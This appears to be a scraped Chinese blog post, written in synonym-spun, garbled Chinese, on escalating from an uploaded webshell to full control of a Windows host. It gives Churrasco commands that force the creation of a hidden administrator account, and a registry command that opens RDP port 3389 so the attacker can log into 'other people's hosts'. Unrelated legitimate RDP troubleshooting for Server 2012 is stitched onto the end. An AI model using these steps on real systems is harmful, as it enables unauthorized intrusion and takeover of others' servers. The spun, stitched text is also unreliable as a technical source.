简明的讲一下。
有很多小白误认为上行了一句话木马用菜刀链接就等于拿到shell了,其实不然。
系统为了都有有权限治理系统,依据权限高下来选择用户在这台机器上能做的事。
比如有的文件规则了低权限用户是不可读写的,而这些文件理论是咱们想要失掉的敏感文件。
有的文件夹是规则不能读写的,那么咱们就不能上行任何到这个文件夹,也不可从这个文件夹里运转任何程序,所以咱们衔接上主机都要找一个可读可写的文件夹来继续上行咱们须要的程序,如开后门的程序。
普通的网站都存储在主机权限比拟低的文件夹里,所以即使咱们上行了WebShell,最多也只能够对网站所在的文件夹操作,而不能完整的控制整个主机。所以咱们以一个权限相当高的用户来访问该主机。
Windows中以用户组来调配权限,每个用户组有不同的权限,其中最高权限用户组是Administrators组,领有对整个系统启动操作system权限。每个用户组下可以创立多个用户。
在Win10以前的Windows系统版本中,可以经过右键此电脑=》治理=》系统工具=》本地用户和组来检查用户组及用户组中的用户。
我试过各种大马,配置其实都迥然不同,不过不知道是不是我经常使用的要素,外面的cmd并不怎样好用。大马里我团体感觉最有用的就是检查文件权限属性的配置,这个使咱们在找后门上行点的时刻是十分好用的,并且这个配置在菜刀里是没有的。
这种php大马可以在Perms项下看到文件的读写权限属性。
创立系统用户的命令如下:
netuser[username][password]/add
netlocalgroupAdministrators[username]/add
netuser[username]/active:yes
因为普通网站被放在主机中权限比拟低的文件夹中,因此间接创立Administrator用户的命令是不被口头的。
巴西烤肉是一个十分微弱的程序,它可以忽视拒绝强迫口头cmd命令,经常被用到提权中。
咱们经过菜刀将cmd.exe和巴西烤肉上行到网站文件夹中。
因为起初没找到Windows主机的网站模板,因此上方就不带图了,环节所有手打恢复,体谅
先将终端门路设置为咱们自己上行的cmd.exe
SETP../../www/uploads/cmd.exe
再用巴西烤肉强迫口头命令。巴西烤肉语法:Churrasco.exe"yourcommand"
Chu.exe"netuser[username][password]/add&netlocalgroupAdministrators[username]/add"
若无报错,那么咱们就曾经成为系统治理员账户了。检查以后用户会发现咱们创立的用户:
至此,咱们曾经创立了超级权限的用户,曾经可以对整个主机启动操作了。然而在终端里操作总有些不繁难,上方咱们引见一下拿下权限后如何远程衔接启动桌面操作。
远程桌面协定(RDP,RemoteDesktopProtocol)是一个多通道(multi-channel)的协定,让用户(客户端或称本地电脑)连上提供微软终端机服务的电脑(主机端或称远程电脑)。大局部的Windows都有客户端所需软件。服务端电脑方面, 自入耳取送到TCP3389端口的数据 。【百度百科】
这是一种十分繁难的对主机的操作形式,普通的网站治理员都会开启3389端口远程桌面服务。而有的安保素养比拟高的治理员则会选用将3389端口封锁,甚至开启防火墙制止任何开启3389的操作。
在无防火墙的状况下,咱们可以用cmd命令来减少注册表开启3389端口,或许经常使用他人留下的工具。
将以下命令写入一个.BAT文件,将其拖入主机可读写目录口头,即可开启3389端口。
此种对WindowsXP和2003系统有用,不用重起
REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d00000000/f
创立好用户,开启远程桌面配置,就可以用此用户远程登陆他人的主机间接启动桌面操作,岂不是美滋滋。
Win+R关上【运转】窗口,运转
mstsc/admin
用间接创立的用户名和明码登录,OK。
【问题状况】
远程桌面无法连接提示如下:
2 我的远程桌面是开启的 :
3.服务状态也是开启的:
4.查看端口状态的时候没有3389端口。后来发现时由于我上午删除了RD 回话主机配置:
解决办法:
右键RD会话主机配置—创建新的连接:
下一步:填写上 连接的名称,下一步直到完成。
然后:在刚刚创建的连接上右键–点击属性 ——远程控制—-勾选使用默认用户配置的控制
最后:将
Remote Desktop Services
Remote Desktop Configuration
这2个服务 手动改为自动启动。重启计算机可以解决问题了
至此设置完毕,默认开启的说3389端口,防火墙默认是开启的,如果为了安全,可以自行修改端口,但是修改后的端口要在防火墙中添加例外才可以进行远程。
呵呵!很简单: 如果2012系统的电脑是被连接的,那么在按下快捷键 WIN+Break后选择高级系统设置---远程---在允许远程协助连接这台计算机 前面打勾---下面选择 允许任意版本远程桌面连接到这台计算机 确定OK;如果2012系统是控制别人的电脑,在确保对方做了上诉操作后,你只要输入地址的后面加上:3389(冒号:3389)就可以了.
标签: 浸透测试、 主机安保、 mstsc、 远程桌面、本文地址: https://yihaiquanyi.com/article/159f69fd01b85e0efe19.html
上一篇:MailPlus利用Synology二十五Server打造个人...